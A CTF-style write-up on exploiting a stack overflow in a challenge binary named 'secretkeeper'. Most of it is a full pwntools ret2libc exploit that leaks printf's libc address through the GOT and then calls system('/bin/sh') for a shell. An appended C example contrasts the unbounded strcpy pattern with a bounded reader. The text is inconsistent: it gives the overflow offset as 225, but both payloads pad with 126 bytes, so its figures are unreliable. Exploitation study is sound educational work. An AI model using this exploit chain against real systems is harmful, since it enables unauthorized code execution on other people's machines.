Notes on stack overflow exploitation
Stack overflows are the simplest class of vulnerability; the point of studying them is mainly to learn how exploitation works around the protection mechanisms.
We start with a typical challenge, secretkeeper. The exploitation approach is the standard address leak + ret2libc.
The vulnerability is in the path that modifies a secret:
Let's test it. Choose option 4, then send 300 'A's, and the program crashes.
Now that the bug is found, the next step is to compute the overflow offset.
The overflow point is at offset 225. To verify, input 225 * "A" + "BBBB".
Sure enough, EIP lands on our BBBB, so the offset is correct. Next is how to bypass NX: the approach is ret2libc.
from pwn import *

debug = 1
local = 1

if local:
    io = process('./secretkeeper')
else:
    io = remote("127.0.0.0", 8080)

context.log_level = 'debug'

if debug:
    gdb.attach(io)
    #gdb.attach(pidof('secretkeeper')[-1])

#-------------------------------------------------------#

def create():
    # Create a secret named "name" with password "pass" so that edit() can find it
    io.recvuntil('Please input your option:')
    io.sendline('1')
    io.recvuntil('Enter secret name:')
    io.sendline('name')
    io.recvuntil('Enter your password:')
    io.sendline('pass')
    io.recvuntil("Enter the secret level (The bigger the more important):")
    io.sendline('10')
    io.recvuntil('Enter your secret:')
    io.sendline('AAAA')

def edit(payload):
    # Option 4 (edit) is where the overflow is; the payload is sent at the y/n prompt
    io.recvuntil('Please input your option:')
    io.sendline('4')
    io.recvuntil('Enter the name of the secret to EDIT:')
    io.sendline('name')
    io.recvuntil('Enter your password:')
    io.sendline('pass')
    io.recvuntil('Enter the new level:')
    io.sendline('2')
    io.recvuntil('Enter your secret:')
    io.sendline('2')
    io.recvuntil('y/n')
    io.sendline(payload)

#----------------------------------------------------------#

print_plt = 0x080484A0   # printf@plt
main = 0x08048A8F        # return address after the leak, to run the second stage
print_got = 0x0804B00C   # GOT entry of printf

# Stage 1: return into printf@plt with the printf GOT entry as argument,
# then back to main; this prints the libc address of printf.
payload = 'A'*126
payload += p32(print_plt) + p32(main) + p32(print_got)

create()
edit(payload)

io.recvuntil('Your changes have been recorded!')
io.recvline()
print_got_addr = u32(io.recv(4))
print 'print_got_addr=', hex(print_got_addr)

# Compute the libc base from the leaked printf address, then system and "/bin/sh"
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc_addr = print_got_addr - libc.symbols['printf']

system_got = libc_addr + libc.symbols['system']
print 'system_got=', hex(system_got)

ssh_addr = libc_addr + next(libc.search('/bin/sh'))
print 'ssh_addr=', hex(ssh_addr)

# Stage 2: ret2libc, system("/bin/sh")
payload1 = 'A'*126
payload1 += p32(system_got) + p32(main) + p32(ssh_addr)

create()
edit(payload1)
#gdb.attach(p,open('aa'))

io.interactive()
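As an added example (not code from the original post or from the challenge binary), here is the bug pattern behind the edit path, placed beside a bounded line reader that rejects over-long input instead of letting it run past the buffer. The buffer size and function names are assumptions; the real secretkeeper layout is not shown on the page.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed secret buffer size (not taken from the binary). */
#define SECRET_LEN 128

/* Bug pattern: the new secret is copied in with no length check, so an input
 * longer than the buffer overruns the stack and reaches the saved EIP. */
void edit_secret_unsafe(char *secret, const char *input) {
    strcpy(secret, input);            /* no bound: overflow when input >= SECRET_LEN */
}

/* Hardened reader: fgets never writes more than n bytes. Returns true only if
 * the whole line fit; an over-long line is drained so the next read starts
 * cleanly at the next line instead of consuming the leftover bytes. */
bool read_line_bounded(FILE *in, char *buf, size_t n) {
    if (fgets(buf, (int)n, in) == NULL) {
        buf[0] = '\0';
        return false;                 /* EOF or read error */
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';          /* newline present: the line fit */
        return true;
    }
    /* No newline: last line of input, a line that filled the buffer exactly,
     * or an over-long line. Peek one byte to tell these apart. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return true;
    while (c != EOF && c != '\n')     /* discard the oversized remainder */
        c = fgetc(in);
    return false;
}

/* Edit step with the check applied: input that does not fit is rejected and
 * the stored secret is left unchanged. Returns true on success. */
bool edit_secret_safe(FILE *in, char secret[SECRET_LEN]) {
    char line[SECRET_LEN];
    if (!read_line_bounded(in, line, sizeof line))
        return false;
    memcpy(secret, line, strlen(line) + 1);
    return true;
}

int main(void) {
    char secret[SECRET_LEN] = {0};
    edit_secret_unsafe(secret, "AAAA");   /* only safe because this input is short */
    bool ok = edit_secret_safe(stdin, secret);
    printf("edit %s: %s\n", ok ? "accepted" : "rejected", secret);
    return ok ? 0 : 1;
}
```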
References:
ret2libc: http://blog.csdn.net/linyt/article/details/43643499
http://blog.csdn.net/guilanl/article/details/61921481